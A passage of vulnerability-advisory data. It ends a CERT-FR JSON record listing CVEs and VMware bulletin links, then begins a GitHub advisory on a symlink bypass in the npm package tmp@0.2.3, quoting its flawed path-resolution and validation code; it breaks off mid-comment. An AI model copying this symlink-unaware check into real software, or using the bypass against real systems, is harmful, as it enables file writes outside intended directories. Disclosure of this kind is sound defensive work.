"url": "https://www.cve.org/CVERecord?id=CVE-2024-3446"
},
{
"name": "CVE-2025-50082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50082"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2025-50097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50097"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2025-50084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50084"
},
{
"name": "CVE-2025-50079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50079"
},
{
"name": "CVE-2025-1795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
},
{
"name": "CVE-2021-35603",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35603"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2025-55193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55193"
},
{
"name": "CVE-2025-21574",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21574"
},
{
"name": "CVE-2024-22019",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22019"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2020-2754",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2754"
},
{
"name": "CVE-2020-14796",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14796"
},
{
"name": "CVE-2025-21580",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21580"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-55754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55754"
},
{
"name": "CVE-2025-53023",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53023"
},
{
"name": "CVE-2025-21575",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21575"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2025-21577",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21577"
},
{
"name": "CVE-2022-21628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21628"
},
{
"name": "CVE-2024-4467",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4467"
},
{
"name": "CVE-2024-21011",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21011"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2021-2369",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2369"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2024-27983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27983"
},
{
"name": "CVE-2025-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23085"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-5642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
},
{
"name": "CVE-2025-59425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59425"
},
{
"name": "CVE-2024-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3219"
},
{
"name": "CVE-2025-50096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50096"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2025-9232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
},
{
"name": "CVE-2025-23165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23165"
},
{
"name": "CVE-2023-30584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30584"
},
{
"name": "CVE-2025-61795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61795"
},
{
"name": "CVE-2025-30705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30705"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2025-50088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50088"
},
{
"name": "CVE-2024-21892",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21892"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-21147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21147"
},
{
"name": "CVE-2024-27982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27982"
},
{
"name": "CVE-2020-14581",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14581"
},
{
"name": "CVE-2024-37372",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37372"
},
{
"name": "CVE-2025-50077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50077"
},
{
"name": "CVE-2025-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23083"
},
{
"name": "CVE-2021-2388",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2388"
},
{
"name": "CVE-2025-50092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50092"
},
{
"name": "CVE-2025-50099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50099"
},
{
"name": "CVE-2021-35588",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35588"
},
{
"name": "CVE-2025-41244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41244"
},
{
"name": "CVE-2024-21140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21140"
},
{
"name": "CVE-2025-30684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30684"
},
{
"name": "CVE-2024-21094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21094"
},
{
"name": "CVE-2025-48989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
},
{
"name": "CVE-2022-21365",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21365"
},
{
"name": "CVE-2025-50093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50093"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2020-14782",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14782"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-21579",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21579"
},
{
"name": "CVE-2023-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21937"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2025-50087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50087"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-4450",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4450"
},
{
"name": "CVE-2024-7592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
},
{
"name": "CVE-2023-2650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
},
{
"name": "CVE-2022-21434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21434"
},
{
"name": "CVE-2025-54410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54410"
},
{
"name": "CVE-2023-52970",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52970"
},
{
"name": "CVE-2022-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3996"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2022-21294",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21294"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2020-2755",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2755"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2024-43485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43485"
},
{
"name": "CVE-2020-14779",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14779"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2023-22045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22045"
},
{
"name": "CVE-2025-30721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30721"
},
{
"name": "CVE-2025-58056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2024-21138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21138"
},
{
"name": "CVE-2025-50091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50091"
},
{
"name": "CVE-2024-22018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22018"
},
{
"name": "CVE-2023-22049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22049"
},
{
"name": "CVE-2022-21341",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21341"
},
{
"name": "CVE-2025-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23166"
},
{
"name": "CVE-2021-35578",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35578"
},
{
"name": "CVE-2024-0397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0397"
},
{
"name": "CVE-2020-14583",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14583"
},
{
"name": "CVE-2022-21340",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21340"
},
{
"name": "CVE-2024-12254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12254"
},
{
"name": "CVE-2025-4516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4516"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2022-3358",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3358"
},
{
"name": "CVE-2022-21293",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21293"
},
{
"name": "CVE-2022-2097",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2097"
},
{
"name": "CVE-2025-50104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50104"
},
{
"name": "CVE-2020-2800",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2800"
},
{
"name": "CVE-2025-6242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6242"
},
{
"name": "CVE-2025-61772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61772"
},
{
"name": "CVE-2025-30722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30722"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2022-21282",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21282"
},
{
"name": "CVE-2022-21349",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21349"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2024-21891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21891"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-30687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30687"
},
{
"name": "CVE-2023-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21968"
},
{
"name": "CVE-2025-50101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50101"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-61748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61748"
},
{
"name": "CVE-2025-4207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4207"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2022-21248",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21248"
},
{
"name": "CVE-2023-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21930"
},
{
"name": "CVE-2024-22017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22017"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-8885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8885"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2025-30704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30704"
},
{
"name": "CVE-2021-35564",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35564"
},
{
"name": "CVE-2023-52969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52969"
},
{
"name": "CVE-2025-46551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46551"
},
{
"name": "CVE-2025-30693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30693"
},
{
"name": "CVE-2025-21585",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21585"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2025-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23084"
},
{
"name": "CVE-2022-3602",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3602"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2022-1434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1434"
},
{
"name": "CVE-2020-2757",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2757"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2024-4032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
},
{
"name": "CVE-2025-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40025"
},
{
"name": "CVE-2025-61620",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61620"
},
{
"name": "CVE-2021-35556",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35556"
},
{
"name": "CVE-2024-8244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8244"
},
{
"name": "CVE-2024-21085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21085"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2023-39331",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39331"
},
{
"name": "CVE-2025-55315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55315"
},
{
"name": "CVE-2021-35560",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35560"
},
{
"name": "CVE-2025-21581",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21581"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2025-41242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41242"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2025-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
},
{
"name": "CVE-2023-39332",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39332"
},
{
"name": "CVE-2020-2756",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2756"
},
{
"name": "CVE-2024-27980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27980"
},
{
"name": "CVE-2023-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21967"
},
{
"name": "CVE-2025-30685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30685"
},
{
"name": "CVE-2023-39333",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39333"
},
{
"name": "CVE-2022-21619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21619"
},
{
"name": "CVE-2025-30695",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30695"
},
{
"name": "CVE-2025-30688",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30688"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2025-61780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61780"
},
{
"name": "CVE-2021-35561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35561"
},
{
"name": "CVE-2022-21476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21476"
},
{
"name": "CVE-2025-53066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2023-6597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6597"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
},
{
"name": "CVE-2022-21541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21541"
},
{
"name": "CVE-2025-27221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27221"
},
{
"name": "CVE-2022-21360",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21360"
},
{
"name": "CVE-2022-21296",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21296"
},
{
"name": "CVE-2022-21540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21540"
},
{
"name": "CVE-2025-50083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50083"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
},
{
"name": "CVE-2024-36137",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36137"
},
{
"name": "CVE-2020-14577",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14577"
},
{
"name": "CVE-2025-49014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49014"
},
{
"name": "CVE-2024-6923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6923"
},
{
"name": "CVE-2024-8088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
}
],
"initial_release_date": "2025-11-05T00:00:00",
"last_revision_date": "2025-11-05T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0967",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-11-05T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36323",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36323"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36343",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36343"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-99",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36326"
},
{
"published_at": "2025-11-04",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36305",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36305"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36345",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36345"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36329"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-81",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36316"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-41",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36331"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36334",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36334"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36335",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36335"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36340",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36340"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36319",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36319"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36339",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36339"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36322",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36322"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36321",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36321"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-68",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36324"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36336",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36336"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36318",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36318"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36337",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36337"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36346",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36346"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-81",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36315"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36317",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36317"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36344",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36344"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36341",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36341"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36314",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36314"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2024-41",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36330"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36332",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36332"
},
{
"published_at": "2025-11-04",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36304",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36304"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36342",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36342"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36333",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36333"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-99",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36327"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36338",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36338"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-53",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36328"
},
{
"published_at": "2025-11-05",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-68",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36325"
}
]
}
ghsa-52f5-9888-hmc6
Vulnerability from github
Summary
tmp@0.2.3 is vulnerable to an arbitrary temporary file / directory write via a symbolic link passed as the dir parameter.
Details
According to the documentation, the following conditions must hold:
``` // https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* dir: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
```
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not follow symbolic links when resolving paths; path.resolve only normalises the path string and does not consult the filesystem:
js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
/**
 * Turns `name` into an absolute path string, treating it as relative to
 * `tmpDir` unless it already begins with the `tmpDir` string.
 *
 * Resolution is lexical only: path.resolve() normalises the string
 * (`.` / `..` segments, separators) and never reads the filesystem, so a
 * symbolic link that is a component of the result is left unresolved.
 * The value returned is therefore not a canonical (symlink-free) path.
 *
 * @param {string} name   path value to resolve (in this listing, the `dir` / `template` option value)
 * @param {string} tmpDir temporary-directory root the caller later compares the result against
 * @returns {string} absolute, normalised path
 */
function _resolvePath(name, tmpDir) {
// NOTE(review): startsWith() is a raw string-prefix test, not a path-segment
// comparison; containment checks are more reliable when made on canonical
// paths at a separator boundary.
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
// Input does not begin with tmpDir: anchor it under tmpDir, then normalise.
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
/**
 * Validates one path-like option value and throws when it is rejected.
 *
 * - option 'name': the value must not be absolute and must be a bare file
 *   name (no directory part, and not `.` or `..`).
 * - any other option (per the inline comment, 'dir' or 'template'): an
 *   absolute value must begin with the `tmpDir` string, and the value as
 *   resolved by _resolvePath must begin with it as well.
 *
 * Both tmpDir comparisons are made on path strings. Nothing in this function
 * follows symbolic links, so a `dir` value containing a symlink that sits
 * under tmpDir passes even when the link target lies elsewhere. That is the
